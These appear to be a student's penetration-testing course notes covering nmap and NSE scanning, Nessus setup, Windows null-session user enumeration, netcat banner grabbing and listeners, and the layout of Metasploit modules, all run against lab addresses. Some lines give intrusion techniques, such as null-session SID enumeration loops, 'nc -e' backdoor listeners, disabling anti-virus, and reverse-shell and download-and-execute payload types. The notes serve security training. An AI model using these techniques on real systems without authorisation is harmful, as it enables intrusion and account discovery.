  • TCP ISN greatest common denominator (GCD)
  • TCP ISN counter rate (ISR)
  • TCP IP ID sequence generation algorithm (TI)
  • ICMP IP ID sequence generation algorithm (II)
  • Shared IP ID sequence boolean (SS)
  • TCP timestamp option algorithm (TS)
  • TCP initial window size (W,W1-W6)
  • IP don't fragment bit (DF)
  • IP initial time-to-live guess (TG)
  • Explicit congestion notification (CC)

• nmap before 4.51 supported
  • TCP Sequence Prediction
  • SYN Packet to open port
  • NULL packet to open port
  • SYN|FIN|URG|PSH packet top open port
  • ACK packet to open port
  • SYN packet to closed port
  • ACK packet to closed port
  • FIN|PSH|URG packet to closed port
  • UDP packet to closed port

• When Nmap identifies an open port, it displays the default service commonly associated with that port
  • based on nmap-service file, which lists about 2,200 services
  • Aditional services are searchable at the Internet Assigned Numbers Authority (IANA) port assignments at http://www.iana.org/assignments/port-numbers
• Nonstandard port assignments can be determined using version scanning

• invoked with -sV
• or -A for version scanning plus OS fingerprinting, script scan and traceroute
  • -A = -O + -sV + -sC + - -traceroute
• For each listening port discovered during the port scan, Nmap:
  • Makes a connection to TCP and listens for 5 seconds… if response with match: Done!
  • Sends probes to TCP and UDP ports, sending data designed to elicit a response to determine the service type.
    • over 1,000 service fingerprints in the nmap-service-probes file
  • Attempts SSL handshake over TCP ports, and, if successful, probes over SSL connection
  • Issues Null RPC commands to determine if RPC service is in use
    • - -version-trace option shows the details of the probes in real time

Other Version Scanning and information Gathering Tools ..2.96

• THC Amap Free from http://freeworld.thc.org/thc-amap
  • Amap can do a port scan itself, or…
  • …provide Amap with the output file from Nmap (generated using the Nmap “-oG filename” option)
  • It sends triggers to each open port (defined in the appdefs.trig file)
  • It looks for defined responses (from the appdefs.resp file)
  • A useful second opinion to the Nmap version scan

• run tcpdump so that it sniffs all packets going between your machine and the target network of 10.10.10

# tcpdump -nn host [YourLinuxIPaddr] and net 10.10.10

• Then, invoke nmap in one command configured as follows:
  • Don't resolve names
  • Use OS fingerprinting
  • Do a TCP connect scan (3-way handshake)
  • Scan target ports 1-1024
  • Scan the target network 10.10.10.1-255

# nmap -n -O -sT -p 1-1024 10.10.10.1-255

• Next, let's do a version scan of some of the hosts
  • start with 10.10.10.10
  • configure Nmap not to resolve domain names
  • perform a version scan
  • Use target ports 1-150
• Nmap bases its version scan on the contents of the file nmap-service-probes
  • “Probe” lines inidcate what to send
  • “match” lines indicate what to search for in responses

# nmap -n -sV -p 1-150 10.10.10.10

• services in /usr/share/nmap/nmap-service-probes

• Amp triggers and response files:

/usr/etc/appdefs.trig

/usr/etc/appdefs.resp

• -q omit closed ports from output
• -v verbose

# amap -qv 10.10.10.10 1-150

• -b print banners it receives back

# amap -bqv 10.10.10.10 1-150

• use hping to send a TCP SYN packet to port 120-135 on 10.10.10.20

# tcpdump -nn tcp and host [YourLinuxIPaddr] and net 10.10.10
# hping3 --count 6 --destport ++130 --syn 10.10.10.20

• ports 130-134 send resets while 135 silently drops the packet indicating a packet filter
• ++ increments the port even if no response is received

1. Check Software version number
   • compensating controls might block exploitation (network- or host-based IPS, etc.)
2. Check protocol version number spoken
3. Look at its behavior - somewhat invasive
4. Check its configuration - more invasive
   • requires access to target
   • Or, requires configuration documentation from target environment personnel
5. Run exploit against it - potentially dangerous, but potentially very useful
   • Successful exploit shows the vulnerability is present
   • Helps Lower false positives
     • Note that failed exploit does not indicate that the system is secure!

• Not all vulnerabilities lead to exploit
  • some misconfigurations could be associated with information leakage
  • Others might indicate a concern, but without exploitation being possible

• nmap and amap would require interpreting results by hand to find vulnerabilities and result in false positives
• nmap Scripting Engine does work as a vulnerability scanner

• Goals of Nmap Scripting Engine (NSE)
  • Allow for arbitrary messages to be sent or received by Nmap to multiple targets, running scripts in parallel
  • Be easily extendable with community-developed scripts
  • Support extended network discovery (whois, DNS, etc.)
  • Perform more sophisticated version detection
  • Conduct vulnerability scanning
  • Detect infected or backdoored systems
  • Exploit discovered vulnerabilities
• May someday rival nessus and its NASL as a general purpose, free, open source vulnerability scanner

• written in Lua
  • often used in games, Lua is fast, flexible, and free, with a small interpreter that works across platforms and is easily embedded inside of other applications
  • www.lua.org
• To invoke NSE:
  • To run all acripts in the category of 'default'

# nmap -sC [target] -p [ports]

• To run an individual script:

# nmap –script=[all,category,dir,script…] [target] -p [ports]

• Add “–script-trace” for detailed output from each script

• Developers who create NSE scripts identify each script in one of more categories:
  • Safe: Not designed to crash targets, consume bandwidth, or exploit vulns
  • Intrusive: May leave logs, guess passwords, or otherwise impact the target
  • Auth: Test for issues associated with authentication
  • Malware: Detect network-accessible malware or backdoors
  • Version: Detect the version of target's services
  • Discovery: Info gathering about target environment
  • Vuln: Look for a given vulnerability in the target
  • External: Sends information to third-party for lookup (example:whois). Third party could record query, response, or IP address
  • Default: Run this set of scripts when Nmap is invoked just using -sC or -A without a category of individual script specified

• Scripts are located in there own directory, often /usr/shar/nmap/scripts
• The file script.db inventories and categorizes the various types
• Several dozen scripts look for a variety of different conditions:
  • Determine if an FTP server supports bounce scans
  • DNS servers supporting zone transfer
  • Tell if a Windows shell is on a given port (TCP 8888)
  • Test if SMTP server can be used as a relay
  • Many, many more

• safe scripts:

# grep safe /usr/share/nmap/scripts/script.db or

# grep safe /usr/local/share/nmap/scripts/script.db

• intrusive scripts:

# grep intrusive /usr/share/nmap/scripts/script.db or

# grep intrusive /usr/local/share/nmap/scripts/script.db

cd /usr/share/nmap/scripts/script.db

or if from compiled version:

cd /usr/local/share/nmap/scripts/script.db
gedit script.db
cat script.db |grep safe |wc -l
cat script.db |grep discov |wc -l
cat script.db |grep intrusive |wc -l

• this script pulls robots.txt files from web servers
• run this script against 10.10.10.60, just on port 80

nmap -n –script=robots.txt.nse 10.10.10.60 -p 80

• Nmap robots.txt.nse does not display the full contents of robots.txt. It merely lists directories, without the “Disallow:” notation and any “User-agent” restrictions

wget 10.10.10.60/robots.txt * pull robots.txt from all our machines

# nmap -n --script=robots.txt.nse 10.10.10.1-255 -p 80

• nbstat.nse script pulls NetBIOS information from a target
  • Name, MAC address, user info
  • rather like the windows nbtstat command

C:\> nbtstat -A 10.10.10.10
# tcpdump -nn host 10.10.10.10
# nmap -n --script=nbstat.nse 10.10.10.10

To avoid the scan of all 1000 ports:

# nmap -n -sU -p U:137,138 --script=nbstat.nse 192.168.1.102

• use sshv1.nse to determine if the old protocol (v1 is subject to man in the middle) is supported

# nmap -n --script=sshv1.nse --script-trace 10.10.10.60 -p 22

# gedit /usr/share/nmap/scripts/sshv1.nse

• if the sshd service it running on a different port, the script will not run

# gedit /etc/ssh/sshd_config
Port 23
killall -HUP sshd

• verify the service is running on the new port with lsof. -i is for network -P is for port numbers

# lsof -Pi |grep 23

• Now, run nmap with the sshv1.nse script

# nmap -n --script=sshv1.nse 127.0.0.1

• note that the script did not run because it assumed the normal service for the port (telnet)

# nmap -n -sV --script=sshv1.nse 127.0.0.1

• now, the script output should be detected. (–script-trace might help too)

• a version scan is required for nmap to know what service is available at the port

• www.nessus.org
• 25,000 plugins - mix of open source and commercial
• free for home use, but not commercial use

• client-server architecture
  • Client - nessus
  • Server - nessusd
• Available for Linux, MacOS X, Windows, Solaris, FreeBSD
• Nessus 2 versus Nessus 3 & 4
  • Nessus 2: Free and engine freely redistributable (some plugins free, others commercial)
  • Nessus 3 & 4: Commercial, 50% or more faster, with commercial plug-ins
  • The same plugins work in both, unless they use extended plugin functionality of 3 & 4

• Update plugins before a test
• to get latest plugins, you first need to register
  • register and subscribe at www.nessus.org/plugins
  • you get a serial number
  • In Windows and Mac, enter serial number via gui
  • In Linux enter serial number via

# nessus-fetch --register [serial]

• Nessus 3 and 4 auto-update plugins every 24 hours by default
• To force update now:
  • Linux, Solaris, FreeBSD:

# nessus-update-plugins

• Windows and Mac, use the GUI

• For a machine the nessusd is not connected to the internet
• use a different computer and move the plugin directories…
• Or, you could download them via a browser and move the file to the nessusd scanning system via usb
  • unused serial number needed
  • surf to:
    • http://plugins.nessus.org/offline.php (Nessus 3.x and later)
    • http://plugins.nessus.org/manual-register.php (Nessus 2.x)
• Keep and eye on latest plugins released:
  • http://www.nessus.org/plugins/index.php?view=newest

• Record plugins you will use

C:\> type "c:\Program Files\Tenable\Nessus\plugins\plugin_feed_info.inc

# cat /usr/local/lib/nessus/plugins/plugin_feed_info.inc

• record the ones you choose to run
  • All?
  • All-except-dangerous?
  • Specific categories?

• Some plugins could crash a target system or otherwise impair it
  • Some Denial of Service plugins, but not all
    • Some just measure version number
  • password guessing plugins
  • Others
• By default, nessus shuts off dangerous plugins

• Nessus results include
  • An estimate of risk Level
  • Description of each discovered flaw
  • Recommendations for resolution
• You can improve upon these results
  • Verify issue manually, if possible
    • false positive reduction
  • Provide clearer explanations
  • Tune risk level to target organization's profile
  • Provide customized recommendation for target organiztaion
  • prioritize recommendations

Thank you. You can now obtain the newest Nessus plugins at :
http://plugins.nessus.org/get.php?f=all-2.0.tar.gz&u=ae76eef133f752687de5b1c223184a81&p=1c503d053fe6d4adae4fc213ac2321f9

You also need to copy the following file to :

    * /opt/nessus/etc/nessus/nessus-fetch.rc (Unix)
    * C:\Program Files\Tenable\Nessus\Conf (Windows)


nessus-fetch.rc

nessusd -D
nessus &

for version 4:

/opt/nessus/sbin# nessus-service -D

• look at “denial of service” under “Plugin selections”

grep -r -m 1 ACT_DENIAL /usr/local/lib/nessus/plugins |wc -l
grep -r -m 1 ACT_DENIAL /usr/local/lib/nessus/plugins
C:\> cd "c:\Program Files\Tenable\Nessus\plugins\scripts
C:\> findstr ACT_DENIAL *

• click on credentials tab
• most pen testers do not use these options
• several exploits for Windows require a username and password of a limited account, but can deliver local SYSTEM-level access with the exploit.
• SSH password is listed as “unsafe!” because of leaving credential in the Nessus database.

• look through the nessus-services file

gedit /usr/local/var/nessus/nessus-services

• Scanner options

10.10.10.50-60
* zone transfers are not recommended because it may test machines outside scope

• Nessus can enumerate user accounts by iterating through SID's

• activate tcpdump

tcpdump -nn net 10.10.10

• NBE is the default nessus format
• NBE is recommended because one can open the file in Nessus and genterate the others

• Rapid7 NeXpose: www.rapid7.com
• Saint: www.saintcorporation.com
• Retina Network Security Scanner: www.eeye.com
• Lumension PatchLink Scanner (formerly Harris Stat): www.Lumension.com
• BidiBLAH - www.sensepost.com
• Core IMPACT - www.coresecurity.com - exploitation tool, but limited scanner.

• Foundscan: www.foundstone.com
• Qualys: www.qualys.com

• Sara: www-arc.com/sara, free but not as comprehensive as others
• SuperScan - www.foundstone.com, free, but linited to port scnas and Windows information pulling

• BiDiBLAH automates attack tasks
  • Commercial tool from www.senspost.com
  • Free version is limited
    • cannot save config, exits after 20 minutes of use
  • Steps through several steps of an attack, automatically
  • Point and click, conforms to standard attack methodologies.
• nice front end for Google searches, DNS lookups, Port Scanning, Nessus vulnerability scanning, and even metasploit exploitation

• Domain Recon
  • starts with a list of domains
  • Using Google, the tool finds email addresses and references to subdomains
• Forward DNS Lookups
  • Uses results of domains above, plus user supplied list
  • harvests IP addrsses and determines target IP ranges
• Netblocks
  • Perform howis lookups on all info received from DNS
  • Also looks up coutry for each IP with provided IP2C DB
• Reverse DNS lookups
  • Looks up IP addresses to find more domains…back to Domain Recon.

• Port scanning
  • Uses ScanRand technique (pioneered by Dan Kaminsky)
    • sends SYNs, but does not wait for replys,
    • another process waits for SYN-ACK
  • Mac spoofing (not well implemented yet)
  • IP address spoofing, but you have to have a receiving process there to get the results
• All available banners are harvested

• A tree of target hosts is displayed, with each open port and banner
• Attacker can select from these for vulnerability scan
• An attacker-supplied Nessus server then does the vulnerability scan

• Exploitation relies on Metasploit web server provided by the attacker
• automatically chooses a list of Metasploit exploits based on the Nessus results
• reporting all in .doc format

• Pull them during scans
• Use later for password guessing attacks
• Public sources of information:
  • Look at e-mail addresses, blog postings, newsgroup postings, etc.
  • Most organizations use e-mail addresses that contain account names:
    • [account_name]@[target_domain_name]
  • Pull potential user nemas from document metadata
• Ask target personnel for account names for the test

• Linux / Unix:
  • Local

cat /etc/passwd
finger
who
w

• Remotely, across the network:

finger @[targetIP]  (but usually turned off)

• NIS

ypcat passwd
ypcat group

• LDAP

ldapsearch [criteria]

• Windows
  • Pull user lists from Null SMB sessions
  • Automating enumeration via User2sid and Sid2user conversion tools

• Null session: SMB session with no userID, no password, no domain membership
• If tester has SMB access of a target Windows system (via TCP port 135-139 or TCP 445), and the machine is configured to support Microsoft file and print sharing…
  • the attacker can set up a Null session

C:\> net use \\[targetIP] "" /u:""

• We can pull user names:
  • on Windows 2000 targets, if

HKLM\System\CurrentControlSet\Conrtol\Lsa\RestrictAnonymous = 0 (the default)

• on Windows 2003, XP, and Vista targets, if

HKLM\System\CurrentControlSet\Conrtol\Lsa\RestrictAnonymousSAM = 0 (not the default)

• Enum, by Jordan Ritter
  • Command-line tool for pulling information from targets via Null sessions
  • To get users:

C:\> enum -U [targetIP]

• group Membership

C:\> enum -G [targetIP]

• -P password policy information
• -S Shares
• -D Dictionary based password guessing
• Winfingerprint, by Vacuuum
• gui-based tool for pulling various kinds of information from a target, including usernames via Null sessions

• On Windows, each group and account has a unique Security Identifier (SID)
  • Unique number for that system
  • Consists of S-[X]-[Y]-[domain/computer]-RID
    • X is the revision Level (typically 1)
    • Y is an authority level (typically 5 for users and groups)
    • Domain ia a unique number for the given machine of domain
  • Last component is RID
    • Well-known account have common RIDs
      • Original administrator account has a RID of 500 (regardless of name)
      • Guest account has a RID of 501
      • Users created on the macine have RID's 1001 and up
      • Documented by Microsoft at http://support.microsoft.com/kb/243330

• The LookupAccountName API call in Windows converts a SID to a Username, across the network via null session
• The LookupAccountSid converts username to SID
  • Independent of RestrictAnonymous values
  • Controlled by a security policy setting in secpol.msc

Allow anonymous SID/Name Translation

• The Sid2User tool takes a SID and queries a system for the user name
  • We can automate… simple command to look for all RID's from 1000 and up

• Start by establishing a Null session

C:\> net use \\[targetIP] "" /u:""

• then, ask the target for its domain/computer component of the SID

C:\> user2sid \\[targetIP] [machine_name] (or guest)

• Then, with the domain/computer component of SID, we can lookup potential users based on their RIDs:

C:\> for /L %i in (1000,1,1010) do @sid2user \\[targetIP] [SID without RID] %i

• Unzip Enum onto your hard drive
• Your anti-virus tool may not like enum
  • Use the anti-virus administrative GUI to disable the anti-virus else part might still be running
• Extract enum.exe to c:\tools\enum\

Change to the enum directory:

C:\> cd c:\tools\enum

Verify that you are in a directory with enum.exe:

C:\> dir

Now, run enum against 10.10.10.10 configured to extract users:

C:\> enum -U 10.10.10.10

Then, run it to extract groups:

C:\> enum -G 10.10.10.10

Finally, get password policy information:

C:\> enum -P 10.10.10.10

Change to sid directory:

C:\> cd c:\tools\sid

Now invoke the sid2user tool without any options, and read its usage information:

C:\> sid2user.exe

Can run the tool with remote computer name [\\computer_name]. Elements of sid sparated by spaces

First, start a null session:

C:\> net use \\10.10.10.10 "" /u:""

Then run User2sid command to determine overall domain/computer component of the SID by providing it with hostname of target (we could get hostname from an nslookup or ping -a):

C:\> user2sid \\10.10.10.10 trinity

Then, find out the administrators name:

C:\> sid2user \\10.10.10.10 [domain number, starting with 5 followed by a space, followed by 21, followed by space, followed by 3 sets of digits] 500

Don't forget the 500 at the end to specify the administrator's SID

Then, enumerate users, starting at 1000 and going up through 1010:

C:\> for /L %i in (1000,1,1010) do @sid2user \\10.10.10.10 [5 followed by space, followed by 21, followed by space, followed by 3 sets of digits separated by spaces] %i

• Built-in to many Linuxes, and available for Windows
• Recent nmap includes ncat – a re-implementation of many Netcat features, plus encryption
• Netcat takes Standard In, and sends it across the network. Standard Input can be keyboard, redirection from a file,

nc [options] < [file]

or piped from another program

[program] | nc [options]

• Receives data from the network and puts it on Standard Out. Screen, redirected to a file,

nc [options] > [file]

or sent to another program's output

nc [options] | [program]

also

nc -e [program]

• Messages from Netcat itself put on Standard Error

nc [options] [targetIP] [remote_port(s)]

• -l: listen mode (default is client)
• -L: Listen harder (Windows only) - makes a persistent listener–starts listening again after client disconnects
• -u: UDP mode (default is TCP)
• -p: Local port (In listen mode, this is port listened on. In client mode, this is source port for packets sent.)
• -e: Program to execute after connection occurs
• -n: Don't resolve names
• -z: Zero-I/O mode - don't send any data, just emit packets
• -wN: Timeout for connects, wait for N seconds
• -v: Be verbose, printing when a connection is made
• -vv: Be very verbose, printing when connections are made, dropped, etc.

• -r: randomize port when using a range of port

• Connection string gathering from servers or clients
• Port scans
• “Service-is-alive” heartbeats
• “Service-is-dead” notification
• moving files between systems
• Setting up relays to forward connections
• creating backdoor listeners

• A netcat client can connect to a target service, and pull back its service info

$ nc [targetIP] [remote_port]

• you may need to enter a connection string to elicit a response from the target
• Enter Enter for some services
• for HTTP:

HEAD / HTTP/1.0, followed by Enter Enter

• others

• netcat can grab a service strings from a series of ports
• port-range [x-y] for remote_ports(s)
• ports searched in inverse order

$ echo "" | nc -v -n -w1 [targetIP] [port-range]
$ echo "" | nc -v -n -w1 10.10.10.10 1-100

• In effect, this is a port scanner that harvests banners

• A netcat listener can receive a conection and display info about the client

$ nc -v -l -p [local_port]

$ while (true); do nc -vv -z -w3 [targetIP] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done

or

$ while : ; do ...

$ while `nc -vv -z -w3 [targetIP] [target_port] > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo -e "\x07"

• for more sound replace the echo -e “\x07” with

while (true); do echo -e "\x07"; done

• run netcat listener on Linux

# nc -l -p 5555

• run netcat client on Windows

C:\> c:\tools\nc.exe [YourLinuxIPaddr] 5555

• the firewall may need to be disabled

# service iptables stop

• Use Netcat on Linux to verbosely, without resolving names, connect to:
  • 127.0.0.1 on TCP 25
  • 10.10.10.10 on TCP 25
  • 127.0.0.1 on TCP 22
  • 10.10.10.10 on TCP 22
  • 10.10.10.60 on TCP 22
  • 10.10.10.60 on TCP 80
    • enter a connection string for this one

# nc -v -n 127.0.0.1 25
# nc -v -n localhost 25

The latter will not work because?

# nc -v -n 10.10.10.10 25
# nc -v -n 127.0.0.1 22
# nc -v -n 10.10.10.60 22
# nc -v -n 10.10.10.60 80
HEAD / HTTP/1.0 (Followed by Enter Enter)

• Run Netcat to port scan 10.10.10.60, ports 20-80, with -z
• Then do service connection string grabbing, without -z
• Then, try is again without the echo “”
  • When it pauses, try hitting Enter Enter

# nc -v -n -z -w1 10.10.10.60 20-80
# echo "" | nc -v -n -w1 10.10.10.60 20-80
# nc -v -n -w1 10.10.10.60 20-80

output without port range, but different data options:

steve@independence ~ $ nc -vv -n -z 127.0.0.1 32777
(UNKNOWN) [127.0.0.1] 32777 (?) open
 sent 0, rcvd 0
steve@independence ~ $ nc -vv -n 127.0.0.1 32777
(UNKNOWN) [127.0.0.1] 32777 (?) open
SSH-2.0-OpenSSH_5.1
                                  < hit enter here
Protocol mismatch.
 sent 1, rcvd 40
steve@independence ~ $ echo "" | nc -vv -n 127.0.0.1 32777
(UNKNOWN) [127.0.0.1] 32777 (?) open
SSH-2.0-OpenSSH_5.1
Protocol mismatch.
 sent 1, rcvd 40
steve@independence ~ $ echo "" | nc -vv -n 127.0.0.1 32777 > /dev/null
(UNKNOWN) [127.0.0.1] 32777 (?) open
 sent 1, rcvd 40
steve@independence ~ $ echo "" | nc -vv -n 127.0.0.1 32777 2> /dev/null
SSH-2.0-OpenSSH_5.1
Protocol mismatch.
steve@independence ~ $ 

Then with port ranges:

steve@steve-thinkpad:~$ nc -v -n -z 192.168.1.10 32775-32778
nc: connect to 192.168.1.10 port 32775 (tcp) failed: Connection refused
nc: connect to 192.168.1.10 port 32776 (tcp) failed: Connection refused
Connection to 192.168.1.10 32777 port [tcp/*] succeeded!
nc: connect to 192.168.1.10 port 32778 (tcp) failed: Connection refused
steve@steve-thinkpad:~$ echo "" | nc -v -n 192.168.1.10 32775-32778
nc: connect to 192.168.1.10 port 32775 (tcp) failed: Connection refused
nc: connect to 192.168.1.10 port 32776 (tcp) failed: Connection refused
Connection to 192.168.1.10 32777 port [tcp/*] succeeded!
steve@steve-thinkpad:~$ nc -v -n 192.168.1.10 32775-32778
nc: connect to 192.168.1.10 port 32775 (tcp) failed: Connection refused
nc: connect to 192.168.1.10 port 32776 (tcp) failed: Connection refused
Connection to 192.168.1.10 32777 port [tcp/*] succeeded!
SSH-2.0-OpenSSH_5.1

Protocol mismatch.
nc: connect to 192.168.1.10 port 32778 (tcp) failed: Connection refused
steve@steve-thinkpad:~$ 

Notice: the second test does not complete

• Set up a Netcat listener that will verbosely listen on local TCP port 80, not resolving names of systems that connect there:

# nc -v -n -l -p 80

• Then, from another terminal run mozilla in the background

# mozilla &

• surf to http://127.0.0.1
• Look at the Netcat output, specifically the User-Agent string

• Hit CTRL-C in the netcat window and restart it and browse to it from IE on Windows
• try others like Firefox, RealPlayer, Quicktime, surfing to

[IPaddr]:[port]

• Show listening port 25

# netstat -nat | grep 25

• set up Netcat heartbeat to check the port

# while (true); do nc -vv -z -w3 127.0.0.1 25 > /dev/null && echo -e "\x07"; sleep 1; done

• stop sendmail

# service sendmail stop

• the heartbeat should go silent
• start the service

# service sendmail start

• stop the monitor with CTRL-C. If that does not work,

# killall -9 nc

• Create a service is dead alert
• Verify the port is listening

# netstat -nat | grep 25

• set up a Netcat monitor to check that port, printing happy message when the port completes a connection and make a lot of noise when it doesn't

$ while `nc -vv -z -w3 127.0.0.1 25 > /dev/null` ; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; while (true); do echo -e "\x07"; done

# service stop sendmail

• Exploit: Code or technique that a threat uses to take advantage of a vulnerability
  • for a penetration tester exploitation often involves gaining access to a machine to run commands on it
  • Possibly with limited privileges
  • perhaps with superuser privileges
• Some examples
  • Move files to a target machine
  • Take files from a target machine
  • Sniff packets at the target
  • Reconfigure the target machine
  • Install software on a target machine

• False positive reduction / elimination
  • Even if exploit doesn't work, you still may want to report on detected vulnerability
• Proof of vulnerability and therefore more realistic treatment of risk
• Use of one machine as a pivot point to get deeper inside the network
  • More of a sense of what a real bad guy can accomplish

• Service crash
• System crash
• System stability impacted
• System integrity violated
• Data exposure with legal ramifications
• Because of these concerns, verify that exploitation is allowed by rules of Engagement, and double check for a givien system whether it is in scope
• Also, understand the probabilistic nature of exploit success

• Exploit: a piece of code that makes a target machine do something on behalf of an attacker
• Generally speaking, most exploits fall into one of three categories:
  • Service-side exploit
  • Client-side exploit
  • Local privilege escalation
• A penetration tester may need to use any one, or more likely, a combination of each of these kinds of attacks

• Listening service has a vulnerability
• Attacker composes specific packets for service to exploit it
• Firewall filtering must allow inbound packets for given service
  • once we gain access to one system inside firewall, we may be able to pivot

• Windows Services
  • MS-RPC-DCOM: MS 03-026 – Blaster Worm, 2003
  • LSASS: MS 04-11 – Sasser Worm, 2004
  • uPNP: MS 05-39 – Zotob worm/bot, 2005
  • RRAS: MS06-025 – 2006
  • Server Service: MS 06-040 – 2006
  • Server Service: MS 08-067 – Confiker November 2008
  • Approximately one or two big ones per year
• Other Microsoft products on Windows
  • IIS: Numerous examples
• Data Backup Products
  • Veritas, CA Brightstor, and Arkeia
• Virtual Network Computing -VNC
  • Authentication bypass flaw from 2006, and other flaws, often not patched

• Linux and Unix Services:
  • Solaris sadmind command execution flaw, CVE-2003-0722
  • Solaris and Mac OS X Samba v=buffer overflow, CVE-2003-0201
  • Mac OS X Apple File Share buffer overflow, CVE-2004-0430
  • Linux Squid NTLM Authentication buffer overflow, CVE-2004-0541
  • HP-UX LPD service command execution, CVE-2005-3277
  • Numerous Linux flaws in CGI and PHP scripts for web servers, including:
    • Awstats CGI, PHP Wordpress, PHP XML-RPC, PHP-vBulletin

• Client-side exploits wait for a client application to access attacker-supplied response/file, then deliver an exploit
  • More plentiful in recent years
  • For pen tests with client-side exploits in scope, compromise is almost always successful

• Browsers
  • Internet Explorer
  • Firefox
• Media players
  • Quicktime Player
  • Real Player
  • Winamp
• Document-Reading Applications
  • Acrobat Reader
  • Microsoft Word, Powerpoint, Excel
• Run-Time Environments
  • Java

• How to know which client-side software is running?
  • Analyze metadata from any available documents recently produced by the target organizaiton
• Ask Target personnel
  • If they are interested in a thorough test, they may provide info
  • Make a checklist
• Have them surf to testing systems
  • limited - focuses on browsertypes via User-Agent strings
  • Requires user interaction
  • Outbound web proxy may disguise client types
• Guess
  • It is not hard to anticipate what they'll be running

• Ask personnel to run a software inventory tool on representative workstations and send the results
  • Microsoft Baseline Security Analyzer (MBSA) is very helpful
  • Shavlak Technologies' HFNetChk Pro can help
  • Secunia's Corporate Software inspector can as well
  • Custom-written scripts can be helpful too that simply perfor a recursive search of C:\Program Files

C:\> dir /s "c:\Program Files" > inventory.txt

• Output includes last update date if files…indicating last revision and possibly patch date

• Manual user intervention, coordinated via telephone
• E-mail with links
  • Make sure recipients are in the project scope
• Script that launches client programs:

C:\> c:\windows\ie7\iexplore.exe www.testmachine.org

C:\> "c:\Program Files\Mozilla Firefox"\firefox.exe www.testmachine.org

social engineering toolkit – works with metasploit

• Be careful that target personnel use a *representative* sample of a client machine
  • not one that is freshly patched just for the test
• Often, a tester hears:
  • “I'm almost ready for the test,,, just let me update my patches”
  • Such a test is not really revealing the true risks of the target organization
  • Politely explain this to target personnel…
  • And make sure that the Rules of Engagement or scoping agreement mentions using a “representative sample” of machines

• Besides service-side and client-side exploits, we also have local privilege escalation
  • Require some form of access on the machine in advance
  • Possibly client-side exploit, service-side exploit, password guessing, password sniffing, etc.
• Jump from a limited privilege account to higher privileges, such as:
  • root / UID 0 on Linux or Unix
  • Administrator or SYSYEM on Windows
• Can allow tester to read arbitrary files from system, install software, run a sniffer, etc.
• Many vendors do not rate these vulnerabilities as “Critical”, so they are less likely to be patched in a timely fashion

• Various types of local-privilege escalation attacks:
  • Race conditions
  • Attacks against the kernel
  • Local exploit of high-privileged program or service
    • Linux / Unix: SetUID 0 executable files - binaries or scripts
    • Windows: Attacks against processes such as csrss.exe, winlogon.exe, lsass.exe, etc.

• free, open-source exploitation framework
• What is an exploitation framework?
  • An environment for running numerous different exploits in a flexible fashion
  • An environment for creating new exploits, using interchangeable piece parts
  • Simplifies the creation of new exploits
  • Standardizes the usage of new exploits
• Runs on Linux, Mac OS X, and Windows
  • Although, according to documentatino for some versions, “The Metasploit Framework is only partially supporte don the Windows platform. If you would like to access most of thr Framework features from Windows, we recommend using a virtualization environment, such as VMware, with a supported Linux distribution…”

• Metasploit divides up the concept of exploits and payloads
  • An exploit takes advantage of a flaw in a target program
  • The payload makes the target do something the attacker wants
  • Metasploit includes over 475 exploits and many dozen payloads

• The course DVD includes several versions of Metasploit
  • Located in the Linux image in /home/tools/framework-[version]
  • Penetration tester often rely on multiple version of Metasploit
  • Some version inclde exploits that other version don't have
  • In some version, a given exploit is more reliable
    • More likely to succeed in getting access, less likely to crash target service
    • In you can install the target vulnerable app in a lab, you may want to check the exploit against it to experiment
  • And.. some testers are just maore familiar with a given version
• Metasploit 2.X was written in (mostly) Perl
• Metasploit 3.X was written in (mostly) Ruby

• We can look at Metasploit from within its console interface, or from te file system of the machine running metsploit
• To look around inside the Metasploit console, you could run:

# cd /home/tools/framework-[version]
# ./msfconsole
msf> show exploits
msf> show payloads

• Documentation
• User interfaces
• Modules
• Exploit Creation Tools
• Other items

• msfconsole: a customized metasploit command prompt… use this one!
• msfd: a daemon that listens by default on TCP port 55554, offering up msfconsole access to anyone that conects
  • Useful for having a single Metasploit install accessed by multiple users, all using the same version at the same time
  • But, no authentication or encryption
• msfcli: the command line, all options specified in single command, useful for scripts

• msfgui: a ruby-based GTK (GIMP Toolkit) GUI for Metasploit
  • msfgui is not going to be supported
• msfweb: creates web server on TCP port 55555, listening for browser connections that can configure Metasploit exploits
  • msfweb is a good demo

cd /home/tools/framework-3.3.3/modules
ls

• auxiliary: Miscellaneous items, including vuln checkers, denial of service tools, etc
• encoders: Modules that convert exploits an payloads to a different form to bypass filters for certain characters and dodge signature-based detection
• exploits: Metasploit's exploit arsenal
• nops: Modules that create NOP sleds from functionally equivalent machine-language instructions to improve the odds of successful exploitation
• payloads: Metasploit's payload arsenal
• Modules.rb.ts.rb: A test suite for various modules

cd /home/tools/framework-3.3.3/modules/exploits
ls

• sorted by operating system
  • bsdi, hpux, irix, osx, solaris, unix, windows
  • multi: exploits that hit multiple target operating system types, including some browser attacks, PHP exploits, and some samba exploits
  • test: experimental exploits often used as examples for new exploit development
• Note that the operating system directories contain exploits for the OS itself, as well as programs that urn on the OS
  • example: windows directory includes exploits for Windows and software that runs on Windows (anti-virus, backup tools, games, POP3 and IMAP mail server, etc.)

cd /home/tools/framework-3.3.3/modules/exploits/windows
ls

• Numerous categories, but some of the most useful include:
  • dcerpc: Microsoft's implementation of the Distrubuted Computing Environment Remote Procedure Call, often used for remote access and administration of Windows
  • browser: Clent-side exploits, mostly for IE, but also includes AIM, RealPlayer, QuickTime, iTunes, Winamp, etc.
  • iis: Server-side exploits for Microsoft's web server
  • smb: Server-side exploits for Microsoft's Server Message Block implementation
  • vnc: Attacks against Virtual Network Computing clients and servers

cd /home/tools/framework-3.3.3/modules/exploits/windows/smb
gedit ms08_067_netapi.rb

• OSVDB number searchable at osvdb.org
• CVE number searchable at cve.mitre.org
• Bugtraq ID

cd /home/tools/framework-3.3.3/modules/payloads
ls

• singles: Stand-alone payloads that have their functionality and communication bundled together
• stagers: Payload piece-parts that load first and allow a later stare to communicate with the attacker in numerous flexible fashions
• stages: Payload piece-parts that implement a function, but communicate using an already-loaded stager
• a stager + a stage = full payload

cd /home/tools/framework-3.3.3/modules/payloads/singles/windows
ls

• adduser: Creates an account and adds it to the local admin group
• exec: Runs a command of attacker's choosing
• download_exec: Downloads a file via HTTP and executes it
• shell_bind_tcp: Standard TCP shell listener
• shell_bind_tcp_xpfw: shots off Windows firewall and starts TCP shell listener
• shell _reverse_tcp: Reverse shell back to attacker

